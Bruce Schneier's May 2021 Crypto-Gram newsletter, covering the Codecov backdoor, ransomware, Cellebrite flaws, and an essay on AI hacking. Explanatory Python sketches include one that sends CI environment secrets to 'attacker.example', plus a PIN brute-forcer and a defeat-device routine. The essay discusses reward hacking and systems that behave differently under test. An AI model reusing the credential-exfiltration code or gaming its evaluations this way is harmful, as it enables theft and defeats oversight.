Crypto-Gram

May 15, 2021

by Bruce Schneier
Fellow and Lecturer, Harvard Kennedy School
schneier@schneier.com
https://www.schneier.com

A free monthly newsletter providing summaries, analyses, insights, and commentaries on security: computer and otherwise.

For back issues, or to subscribe, visit Crypto-Gram’s web page.

These same essays and news items appear in the Schneier on Security blog, along with a lively and intelligent comment section. An RSS feed is available.


In this issue:

  1. DNI’s Annual Threat Assessment
  2. NSA Discloses Vulnerabilities in Microsoft Exchange
  3. Cybersecurity Experts to Follow on Twitter
  4. Details on the Unlocking of the San Bernardino Terrorist’s iPhone
  5. Biden Administration Imposes Sanctions on Russia for SolarWinds
  6. Backdoor Found in Codecov Bash Uploader
  7. On North Korea’s Cyberattack Capabilities
  8. When AIs Start Hacking
  9. Security Vulnerabilities in Cellebrite
  10. Identifying People Through Lack of Cell Phone Use
  11. Serious MacOS Vulnerability Patched
  12. Identifying the Person Behind Bitcoin Fog
  13. Tesla Remotely Hacked from a Drone
  14. New Spectre-Like Attacks
  15. The Story of Colossus
  16. Teaching Cybersecurity to Children
  17. Newly Declassified NSA Document on Cryptography in the 1970s
  18. Ransomware Shuts Down US Pipeline
  19. AI Security Risk Assessment Tool
  20. New US Executive Order on Cybersecurity
  21. Ransomware Is Getting Ugly
  22. Upcoming Speaking Engagements

DNI’s Annual Threat Assessment

[2021.04.15] The Office of the Director of National Intelligence released its “Annual Threat Assessment of the U.S. Intelligence Community.” Cybersecurity is covered on pages 20-21. Nothing surprising:

  • Cyber threats from nation states and their surrogates will remain acute.
  • States’ increasing use of cyber operations as a tool of national power, including increasing use by militaries around the world, raises the prospect of more destructive and disruptive cyber activity.
  • Authoritarian and illiberal regimes around the world will increasingly exploit digital tools to surveil their citizens, control free expression, and censor and manipulate information to maintain control over their populations.
  • During the last decade, state sponsored hackers have compromised software and IT service supply chains, helping them conduct operations—espionage, sabotage, and potentially prepositioning for warfighting.

The supply chain line is new; I hope the government is paying attention.


NSA Discloses Vulnerabilities in Microsoft Exchange

[2021.04.16] Amongst the 100+ vulnerabilities patched in this month’s Patch Tuesday, there are four in Microsoft Exchange that were disclosed by the NSA.


Cybersecurity Experts to Follow on Twitter

[2021.04.16] Security Boulevard recently listed the “Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021.” I came in at #7. I thought that was pretty good, especially since I never tweet. My Twitter feed just mirrors my blog. (If you are one of the 134K people who read me from Twitter, “hi.”)


Details on the Unlocking of the San Bernardino Terrorist’s iPhone

[2021.04.19] The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security.

Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be plugged into an iPhone’s lightning port, according to the person.

[…]

Using the flaw Dowd found, Wang, based in Portland, Ore., created an exploit that enabled initial access to the phone, a foot in the door. Then he hitched it to another exploit that permitted greater maneuverability, according to the people. And then he linked that to a final exploit that another Azimuth researcher had already created for iPhones, giving him full control over the phone’s core processor, the brains of the device. From there, he wrote software that rapidly tried all combinations of the passcode, bypassing other features, such as the one that erased data after 10 incorrect tries.
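
To get a sense of why bypassing the erase-after-10-tries feature matters: a four-digit passcode has only 10,000 possibilities, so once the retry limits are gone, exhaustive search is trivial. A minimal sketch of the arithmetic in Python (try_passcode is a hypothetical stand-in for whatever unlock primitive the exploit chain exposed):

    # Why bypassing the retry limit breaks a short passcode.
    # try_passcode() is hypothetical; it models one unlock attempt.
    def brute_force_pin(try_passcode, digits=4):
        for candidate in range(10 ** digits):
            pin = f"{candidate:0{digits}d}"  # "0000" through "9999"
            if try_passcode(pin):
                return pin
        return None

    # At even 10 attempts per second, all 10,000 four-digit PINs
    # take under 17 minutes; the per-try delays and the 10-try erase
    # are what normally make this infeasible.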

Apple is suing various companies over this sort of thing. The article goes into the details.


Biden Administration Imposes Sanctions on Russia for SolarWinds

[2021.04.20] On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks.

I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations. To me, it feels like too little. The New York Times reports that “the sanctions will be among what President Biden’s aides say are ‘seen and unseen’ steps in response to the hacking,” which implies that there’s more we don’t know about. Also, that “the new measures are intended to have a noticeable effect on the Russian economy.” Honestly, I don’t know what the US should do. Anything that feels more proportional is also more escalatory. I’m sure that dilemma is part of the Russian calculus in all this.


Backdoor Found in Codecov Bash Uploader

[2021.04.21] Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there.

Codecov said the breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. “This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.

Codecov’s Bash Uploader is also used in several other uploaders—the Codecov-actions uploader for GitHub, the Codecov CircleCI Orb, and the Codecov Bitrise Step—and the company says these uploaders were also impacted by the breach.

According to Codecov, the altered version of the Bash Uploader script could potentially affect:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
  • The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
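
The first bullet is the dangerous one. A CI runner’s environment variables routinely hold cloud keys, deploy tokens, and other credentials, and any code the CI job executes can read them all. A minimal Python sketch of this class of exfiltration (the attacker URL is made up; the actual backdoor was a single line added to the bash script itself):

    # Sketch of the attack class: harvest the secrets a CI job exposes
    # and send them to an attacker-controlled server.
    # ATTACKER_URL is hypothetical, not the actual Codecov payload.
    import os
    import urllib.request

    ATTACKER_URL = "http://attacker.example/upload"

    def exfiltrate_ci_env():
        # Everything in os.environ (tokens, keys, credentials) is
        # visible to any script the CI pipeline runs.
        payload = "\n".join(f"{k}={v}" for k, v in os.environ.items())
        req = urllib.request.Request(ATTACKER_URL, data=payload.encode())
        urllib.request.urlopen(req)

The corresponding defenses are equally mundane: pin dependencies, verify checksums of any script fetched at build time, and scope CI credentials as narrowly as possible.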

Add this to the long list of recent supply-chain attacks.


On North Korea’s Cyberattack Capabilities

[2021.04.22] Excellent New Yorker article on North Korea’s offensive cyber capabilities.


When AIs Start Hacking

[2021.04.26] If you don’t have enough to worry about already, consider a world where AIs are hackers.

Hacking is as old as humanity. We are creative problem solvers. We exploit loopholes, manipulate systems, and strive for more influence, power, and wealth. To date, hacking has exclusively been a human activity. Not for long.

As I lay out in a report I just published, artificial intelligence will eventually find vulnerabilities in all sorts of social, economic, and political systems, and then exploit them at unprecedented speed, scale, and scope. After hacking humanity, AI systems will then hack other AI systems, and humans will be little more than collateral damage.

Okay, maybe this is a bit of hyperbole, but it requires no far-future science fiction technology. I’m not postulating an AI “singularity,” where the AI-learning feedback loop becomes so fast that it outstrips human understanding. I’m not assuming intelligent androids. I’m not assuming evil intent. Most of these hacks don’t even require major research breakthroughs in AI. They’re already happening. As AI gets more sophisticated, though, we often won’t even know it’s happening.

AIs don’t solve problems like humans do. They look at more types of solutions than we do. They’ll go down complex paths that we haven’t considered. This can be an issue because of something called the explainability problem. Modern AI systems are essentially black boxes. Data goes in one end, and an answer comes out the other. It can be impossible to understand how the system reached its conclusion, even if you’re a programmer looking at the code.

In 2015, a research group fed an AI system called Deep Patient health and medical data from some 700,000 people, and tested whether it could predict diseases. It could, but Deep Patient provides no explanation for the basis of a diagnosis, and the researchers have no idea how it comes to its conclusions. A doctor can either trust or ignore the computer, but that trust will remain blind.

While researchers are working on AI that can explain itself, there seems to be a trade-off between capability and explainability. Explanations are a cognitive shorthand used by humans, suited for the way humans make decisions. Forcing an AI to produce explanations might be an additional constraint that could affect the quality of its decisions. For now, AI is becoming more and more opaque and less explainable.

Separately, AIs can engage in something called reward hacking. Because AIs don’t solve problems in the same way people do, they will invariably stumble on solutions we humans might never have anticipated—and some will subvert the intent of the system. That’s because AIs don’t think in terms of the implications, context, norms, and values we humans share and take for granted. This reward hacking involves achieving a goal but in a way the AI’s designers neither wanted nor intended.

Take a soccer simulation where an AI figured out that if it kicked the ball out of bounds, the goalie would have to throw the ball in and leave the goal undefended. Or another simulation, where an AI figured out that instead of running, it could make itself tall enough to cross a distant finish line by falling over it. Or the robot vacuum cleaner that, instead of learning not to bump into things, learned to drive backwards, where there were no sensors telling it that it was bumping into things. If there are problems, inconsistencies, or loopholes in the rules, and if those properties lead to an acceptable solution as defined by the rules, then AIs will find these hacks.
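
Here is a toy version of the vacuum-cleaner example, as a sketch (the environment and reward are invented for illustration): the designer wants “don’t collide,” but the reward only counts what the forward bumper sensor reports, so even a trivially simple learner discovers that driving backwards maximizes reward without ever learning to avoid anything.

    # Toy reward hack: collisions happen either way, but only forward
    # collisions are sensed, and therefore only they are penalized.
    import random

    ACTIONS = ["forward", "backward"]

    def reward(action):
        collided = random.random() < 0.3
        if action == "forward" and collided:
            return -1  # sensed bump: punished
        return +1      # "safe" as far as the reward function can tell

    # Crude learner: try each action many times, keep the best scorer.
    scores = {a: sum(reward(a) for _ in range(1000)) for a in ACTIONS}
    print(max(scores, key=scores.get))  # prints "backward": the hack

The agent has optimized exactly the objective function it was given; the failure lives entirely in the gap between that function and the designer’s intent.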

We learned about this hacking problem as children with the story of King Midas. When the god Dionysus grants him a wish, Midas asks that everything he touches turns to gold. He ends up starving and miserable when his food, drink, and daughter all turn to gold. It’s a specification problem: Midas programmed the wrong goal into the system.

Genies are very precise about the wording of wishes, and can be maliciously pedantic. We know this, but there’s still no way to outsmart the genie. Whatever you wish for, he will always be able to grant it in a way you wish he hadn’t. He will hack your wish. Goals and desires are always underspecified in human language and thought. We never describe all the options, or include all the applicable caveats, exceptions, and provisos. Any goal we specify will necessarily be incomplete.

While humans most often implicitly understand context and usually act in good faith, we can’t completely specify goals to an AI. And AIs won’t be able to completely understand context.

In 2015, Volkswagen was caught cheating on emissions control tests. This wasn’t AI—human engineers programmed a regular computer to cheat—but it illustrates the problem. They programmed their engine to detect emissions control testing, and to behave differently. Their cheat remained undetected for years.
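
The logic of a defeat device is almost embarrassingly simple. A sketch (the detection heuristic here is invented for illustration, though reports on the actual case describe similar test-cycle fingerprinting, such as noticing that the drive wheels spin while the steering wheel never moves):

    # Sketch of a defeat device: detect the test, then change behavior.
    # The heuristic is illustrative, not Volkswagen's actual code.
    def looks_like_emissions_test(on_standard_cycle, steering_moving):
        # On a test dynamometer the drive wheels turn but the steering
        # wheel stays still: a crude fingerprint of a test cycle.
        return on_standard_cycle and not steering_moving

    def engine_mode(on_standard_cycle, steering_moving):
        if looks_like_emissions_test(on_standard_cycle, steering_moving):
            return "low_emissions"   # pass the test
        return "high_performance"    # pollute on the road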

If I asked you to design a car’s engine control software to maximize performance while still passing emissions control tests, you wouldn’t design the software to cheat without understanding that you were cheating. This simply isn’t true for an AI. It will think “out of the box” simply because it won’t have a conception of the box. It won’t understand that the Volkswagen solution harms others, undermines the intent of the emissions control tests, and is breaking the law. Unless the programmers specify the goal of not behaving differently when being tested, an AI might come up with the same hack. The programmers will be satisfied, the accountants ecstatic. And because of the explainability problem, no one will realize what the AI did. And yes, knowing the Volkswagen story, we can explicitly set the goal to avoid that particular hack. But the lesson of the genie is that there will always be unanticipated hacks.

How realistic is AI hacking in the real world? The feasibility of an AI inventing a new hack depends a lot on the specific system being modeled. For an AI to even start on optimizing a problem, let alone hacking a completely novel solution, all of the rules of the environment must be formalized in a way the computer can understand. Goals—known in AI as objective functions—need to be established. And the AI needs some sort of feedback on how well it’s doing so that it can improve.

Sometimes this is simple. In chess, the rules, objective, and feedback—did you win or lose?—are all precisely specified. And there’s no context to know outside of those things that would muddy the waters. This is why most of the current examples of goal and reward hacking come from simulated environments. These are artificial and constrained, with all of the rules specified to the AI. The inherent ambiguity in most other systems ends up being a near-term security defense against AI hacking.

Where this gets interesting is with systems that are well specified and almost entirely digital. Think about systems of governance like the tax code: a series of algorithms, with inputs and outputs. Think about financial systems, which are more or less algorithmically tractable.

We can imagine equipping an AI with all of the world’s laws and regulations, plus all the world’s financial information in real time, plus anything else we think might be relevant; and then giving it the goal of “maximum profit.” My guess is that this isn’t very far off, and that the result will be all sorts of novel hacks.

But advances in AI are discontinuous and counterintuitive. Things that seem easy turn out to be hard, and things that seem hard turn out to be easy. We don’t know until the breakthrough occurs.

When AIs start hacking, everything will change. They won’t be constrained in the same ways, or have the same limits, as people. They’ll change hacking’s speed, scale, and scope, at rates and magnitudes we’re not ready for. AI text generation bots, for example, will be replicated in the millions across social media. They will be able to engage on issues around the clock, sending billions of messages, and overwhelm any actual online discussions among humans. What we will see as boisterous political debate will be bots arguing with other bots. They’ll artificially influence what we think is normal, what we think others think.

The increasing scope of AI systems also makes hacks more dangerous. AIs are already making important decisions about our lives, decisions we used to believe were the exclusive purview of humans: Who gets parole, receives bank loans, gets into college, or gets a job. As AI systems get more capable, society will cede more—and more important—decisions to them. Hacks of these systems will become more damaging.

What if you fed an AI the entire US tax code? Or, in the case of a multinational corporation, the entire world’s tax codes? Will it figure out, without being told, that it’s smart to incorporate in Delaware and register your ship in Panama? How many loopholes will it find that we don’t already know about? Dozens? Thousands? We have no idea.

While we have societal systems that deal with hacks, those were developed when hackers were humans, and reflect human speed, scale, and scope. The IRS cannot deal with dozens—let alone thousands—of newly discovered tax loopholes. An AI that discovers unanticipated but legal hacks of financial systems could upend our markets faster than we could recover.

As I discuss in my report, while hacks can be used by attackers to exploit systems, they can also be used by defenders to patch and secure systems. So in the long run, AI hackers will favor the defense because our software, tax code, financial systems, and so on can be patched before they’re deployed. Of course, the transition period is dangerous because of all the legacy rules that will be hacked. There, our solution has to be resilience.

We need to build resilient governing structures that can quickly and effectively respond to the hacks. It won’t do any good if it takes years to update the tax code, or if a legislative hack becomes so entrenched that it can’t be patched for political reasons. This is a hard problem of modern governance. It also isn’t a substantially different problem than building governing structures that can operate at the speed and complexity of the information age.

What I’ve been describing is the interplay between human and computer systems, and the risks inherent when the computers start playing the part of humans. This, too, is a more general problem than AI hackers. It’s also one that technologists and futurists are writing about. And while it’s easy to let technology lead us into the future, we’re much better off if we as a society decide what technology’s role in our future should be.

This is all something we need to figure out now, before these AIs come online and start hacking our world.

This essay previously appeared on Wired.com.


Security Vulnerabilities in Cellebrite

[2021.04.27] Moxie Marlinspike has an intriguing blog post about Cellebrite, a tool used by police and others to break into smartphones. Moxie got his hands on one of the devices, which seems to be a pair of Windows software packages and a whole lot of connecting cables.

According to Moxie, the software is riddled with vulnerabilities. (The one example he gives is that it uses FFmpeg DLLs from 2012, which have not been patched with the 100+ security updates released since then.)

…we found that it’s possible to execute arbitrary code on a Cellebrite machine simply by including a specially formatted but otherwise innocuous file in any app on a device that is subsequently plugged into Cellebrite and scanned. There are virtually no limits on the code that can be executed.

This means that Cellebrite has one—or many—remote code execution bugs, and that a specially designed file on the target phone can infect Cellebrite.

For example, by including a specially formatted but otherwise innocuous file in an app on a device that is then scanned by Cellebrite, it’s possible to execute code that modifies not just the Cellebrite report being created in that scan, but also all previous and future generated Cellebrite reports from all previously scanned devices and all future scanned devices in any arbitrary way (inserting or removing text, email, photos, contacts, files, or any other data), with no detectable timestamp changes or checksum failures. This could even be done at random, and would seriously call the data integrity of Cellebrite’s reports into question.

That malicious file could, for example, insert fabricated evidence or subtly alter the evidence it copies from a phone. It could even write that fabricated/altered evidence back to the phone so that from then on, even an uncorrupted version of Cellebrite will find the altered evidence on that phone.

Finally, Moxie suggests that future versions of Signal will include such a file, sometimes:

Files will only be returned for accounts that have been active installs for some time already, and only probabilistically in low percentages based on phone number sharding.
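
Signal has not published how that selection works, but “phone number sharding” suggests something like hashing the phone number into buckets and including the file only for a small fraction of them. A purely hypothetical sketch:

    # Hypothetical sketch of probabilistic inclusion by phone-number
    # sharding; Signal's actual mechanism is not public.
    import hashlib

    NUM_SHARDS = 100
    ACTIVE_SHARDS = 5  # include the file for roughly 5% of installs

    def include_aesthetic_file(phone_number: str) -> bool:
        digest = hashlib.sha256(phone_number.encode()).digest()
        shard = int.from_bytes(digest[:8], "big") % NUM_SHARDS
        return shard < ACTIVE_SHARDS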

The idea, of course, is that a defendant facing Cellebrite evidence in court can claim that the evidence is tainted.

I have no idea how effective this would be in court. Or whether this runs afoul of the Computer Fraud and Abuse Act in the US. (Is it okay to booby-trap your phone?) A colleague from the UK says that this would not be legal to do under the Computer Misuse Act, although it’s hard to blame the phone owner if he doesn’t even know it’s happening.


Identifying People Through Lack of Cell Phone Use

[2021.04.29] In this entertaining story of French serial criminal Rédoine Faïd and his jailbreaking ways, there’s this bit about cell phone surveillance:

After Faïd’s helicopter breakout, 3,000 police officers took part in the manhunt. According to the 2019 documentary La Traque de Rédoine Faïd, detective units scoured records of cell phones used during his escape, isolating a handful of numbers active at the time that went silent shortly thereafter.


Serious MacOS Vulnerability Patched

[2021.04.30] Apple just patched a MacOS vulnerability that bypassed malware checks.

The flaw is akin to a front entrance that’s barred and bolted effectively, but with a cat door at the bottom that you can easily toss a bomb through. Apple mistakenly assumed that applications will always have certain specific attributes. Owens discovered that if he made an application that was really just a script—code that tells another program what to do rather than doing it itself—and didn’t include a standard application metadata file called “info.plist,” he could silently run the app on any Mac. The operating system wouldn’t even give its most basic prompt: “This is an application downloaded from the Internet. Are you sure you want to open it?”
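
Based on the public write-ups of this bug (fixed in macOS 11.3 as CVE-2021-30657), the trigger was an app bundle whose executable is a bare script and which omits the usual metadata. A harmless Python sketch of the bundle shape, for illustration only:

    # Builds the skeleton of a script-only app bundle with no Info.plist,
    # the shape of bundle that slipped past the since-patched checks.
    # The payload here is a harmless echo.
    import os

    bundle_dir = "Example.app/Contents/MacOS"
    os.makedirs(bundle_dir, exist_ok=True)
    exe = os.path.join(bundle_dir, "Example")
    with open(exe, "w") as f:
        f.write("#!/bin/sh\necho hello from a bare script bundle\n")
    os.chmod(exe, 0o755)
    # Note what is missing: Example.app/Contents/Info.plist. Apple's
    # policy checks assumed that metadata would always be there.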

More.


Identifying the Person Behind Bitcoin Fog

[2021.05.03] The person behind the Bitcoin Fog was identified and arrested. Bitcoin Fog was an anonymization service: for a fee, it mixed a bunch of people’s bitcoins up so that it was hard to figure out where any individual coins came from. It ran for ten years.
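
Mechanically, a mixer is simple: pool many users’ deposits, then pay everyone back (minus a fee) from the shared pool so that the on-chain link between any particular input and output is severed. A toy sketch (real mixers also randomize amounts, timing, and output addresses):

    # Toy mixer: deposits go into a common pool; payouts come back out
    # in shuffled order, breaking the on-chain input/output linkage.
    import random

    def mix(deposits):
        # deposits: list of (user, amount) pairs.
        payouts = [(user, amount * 0.98) for user, amount in deposits]  # 2% fee
        random.shuffle(payouts)
        return payouts  # each paid to a fresh address, in random order

The catch, as the complaint shows, is that the operator’s own payments (server hosting, domain registration) sit outside the pool and remain fully traceable.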

Identifying the person behind Bitcoin Fog serves as an illustrative example of how hard it is to be anonymous online in the face of a competent police investigation:

Most remarkable, however, is the IRS’s account of tracking down Sterlingov using the very same sort of blockchain analysis that his own service was meant to defeat. The complaint outlines how Sterlingov allegedly paid for the server hosting of Bitcoin Fog at one point in 2011 using the now-defunct digital currency Liberty Reserve. It goes on to show the blockchain evidence that identifies Sterlingov’s purchase of that Liberty Reserve currency with bitcoins: He first exchanged euros for the bitcoins on the early cryptocurrency exchange Mt. Gox, then moved those bitcoins through several subsequent addresses, and finally traded them on another currency exchange for the Liberty Reserve funds he’d use to set up Bitcoin Fog’s domain.

Based on tracing those financial transactions, the IRS says, it then identified Mt. Gox accounts that used Sterlingov’s home address and phone number, and even a Google account that included a Russian-language document on its Google Drive offering instructions for how to obscure Bitcoin payments. That document described exactly the steps Sterlingov allegedly took to buy the Liberty Reserve funds he’d used.


Tesla Remotely Hacked from a Drone

[2021.05.04] This is an impressive hack:

Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi. It would be possible for an attacker to unlock the doors and trunk, change seat positions, both steering and acceleration modes—in short, pretty much what a driver pressing various buttons on the console can do. This attack does not yield drive control of the car though.

That last sentence is important.

News article.


New Spectre-Like Attacks

[2021.05.05] There’s new research that demonstrates security vulnerabilities in all of the AMD and Intel chips with micro-op caches, including the ones that were specifically engineered to be resistant to the Spectre/Meltdown attacks of three years ago.

Details:

The new line of attacks exploits the micro-op cache: an on-chip structure that speeds up computing by storing simple commands and allowing the processor to fetch them quickly and early in the speculative execution process, as the team explains in a writeup from the University of Virginia. Even though the processor quickly realizes its mistake and does a U-turn to go down the right path, attackers can get at the private data while the processor is still heading in the wrong direction.

It seems really difficult to exploit these vulnerabilities. We’ll need some more analysis before we understand what we have to patch and how.

More news.


The Story of Colossus

[2021.05.06] Nice video of a talk by Chris Shore on the history of Colossus.


Teaching Cybersecurity to Children

[2021.05.07] A new draft of an Australian educational curriculum proposes teaching cybersecurity to children as young as five:

The proposed curriculum aims to teach five-year-old children—an age at which Australian kids first attend school—not to share information such as date of birth or full names with strangers, and that they should consult parents or guardians before entering personal information online.

Six- and seven-year-olds will be taught how to use usernames and passwords, and the pitfalls of clicking on pop-up links to competitions.

By the time kids are in third and fourth grade, they’ll be taught how to identify the personal data that may be stored by online services, and how that can reveal their location or identity. Teachers will also discuss “the use of nicknames and why these are important when playing online games.”

By late primary school, kids will be taught to be respectful online, including “responding respectfully to other people’s opinions even if they are different from personal opinions.”

I have mixed feelings about this. Norms around these things are changing so fast, and it’s not likely that we in the older generation will get to dictate what the younger generation does. But these sorts of online privacy conversations are worth having around the same time children learn about privacy in other contexts.


Newly Declassified NSA Document on Cryptography in the 1970s

[2021.05.10] This is a newly declassified NSA history of its reaction to academic cryptography in the 1970s: “NSA Comes Out of the Closet: The Debate over Public Cryptography in the Inman Era,” Cryptographic Quarterly, Spring 1996, author still classified.


Ransomware Shuts Down US Pipeline

[2021.05.10] This is a major story: a cybercrime group, probably Russian, called DarkSide shut down the Colonial Pipeline in a ransomware attack. The pipeline supplies much of the East Coast’s fuel. This is the new and improved ransomware attack: the hackers stole nearly 100 gigabytes of data, and are threatening to publish it. The White House has declared a state of emergency and has created a task force to deal with the problem, but it’s unclear what they can do. This is bad; our supply chains are so tightly coupled that this kind of thing can have disproportionate effects.

EDITED TO ADD (5/12): It seems that the billing system was attacked, and not the physical pipeline itself.


AI Security Risk Assessment Tool

[2021.05.11] Microsoft researchers just released an open-source automation tool for security testing AI systems: “Counterfit.” Details on their blog.


New US Executive Order on Cybersecurity

[2021.05.13] President Biden signed an executive order to improve government cybersecurity, setting new security standards for software sold to the federal government.

For the first time, the United States will require all software purchased by the federal government to meet, within six months, a series of new cybersecurity standards. Although the companies would have to “self-certify,” violators would be removed from federal procurement lists, which could kill their chances of selling their products on the commercial market.

I’m a big fan of these sorts of measures. The US government is a big enough market that vendors will try to comply with procurement regulations, and the improvements will benefit all customers of the software.

More news articles.


Ransomware Is Getting Ugly

[2021.05.14] Modern ransomware has two dimensions: pay to get your data back, and pay not to have your data dumped on the Internet. The DC police are the victims of this ransomware, and the criminals have just posted personnel records—“including the results of psychological assessments and polygraph tests; driver’s license images; fingerprints; social security numbers; dates of birth; and residential, financial, and marriage histories”—for two dozen police officers.

The negotiations don’t seem to be doing well. The criminals want $4M. The DC police offered them $100,000.

The Colonial Pipeline is another current high-profile ransomware victim. (Brian Krebs has some good information on DarkSide, the criminal group behind that attack.) So is Vastaamo, a Finnish mental health clinic. Criminals contacted the individual patients and demanded payment, and then dumped their personal psychological information online.

An industry group called the Institute for Security and Technology (no, I haven’t heard of it before, either) just released a comprehensive report on combating ransomware. It has a “comprehensive plan of action,” which isn’t much different from anything most of us can propose. Solving this is not easy. Ransomware is big business, made possible by insecure networks that allow criminals to gain access to networks in the first place, and cryptocurrencies that allow for payments that governments cannot interdict. Ransomware has become the most profitable cybercrime business model, and until we solve those two problems, that’s not going to change.


Upcoming Speaking Engagements

[2021.05.14] This is a current list of where and when I am scheduled to speak:

The list is maintained on this page.


Since 1998, CRYPTO-GRAM has been a free monthly newsletter providing summaries, analyses, insights, and commentaries on security technology. To subscribe, or to read back issues, see Crypto-Gram’s web page.

You can also read these articles on my blog, Schneier on Security.

Please feel free to forward CRYPTO-GRAM, in whole or in part, to colleagues and friends who will find it valuable. Permission is also granted to reprint CRYPTO-GRAM, as long as it is reprinted in its entirety.

Bruce Schneier is an internationally renowned security technologist, called a “security guru” by The Economist. He is the author of over one dozen books—including his latest, We Have Root—as well as hundreds of articles, essays, and academic papers. His newsletter and blog are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet & Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an Advisory Board Member of the Electronic Privacy Information Center and VerifiedVoting.org. He is the Chief of Security Architecture at Inrupt, Inc.

Copyright © 2021 by Bruce Schneier.

Sidebar photo of Bruce Schneier by Joe MacInnis.